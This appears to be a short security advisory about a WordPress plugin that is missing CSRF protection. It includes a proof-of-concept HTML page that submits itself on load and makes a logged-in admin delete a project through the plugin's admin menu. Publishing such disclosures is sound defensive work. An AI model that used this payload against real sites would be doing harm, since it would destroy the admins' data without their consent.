Description The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks
Make a logged in admin open an HTML file containing (where `<<ID>>` is a valid ID):
```
<body onload="document.forms[0].submit()">
<form action="http://example.com/wp-admin/admin.php?page=kkpb-menu" method="post">
<input type="hidden" name="action" value="delete-project">
<input type="hidden" name="id" value="<<ID>>">
</form>
</body>
```